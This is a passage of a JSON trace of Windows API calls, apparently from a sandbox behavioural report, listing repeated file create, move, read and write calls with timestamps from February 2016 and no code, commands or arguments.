"timestamp": 
"2016-02-16 17:41:55,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,883", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,993", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,023", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,023", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,033", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:56,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:56,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:56,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,193", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,233", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": 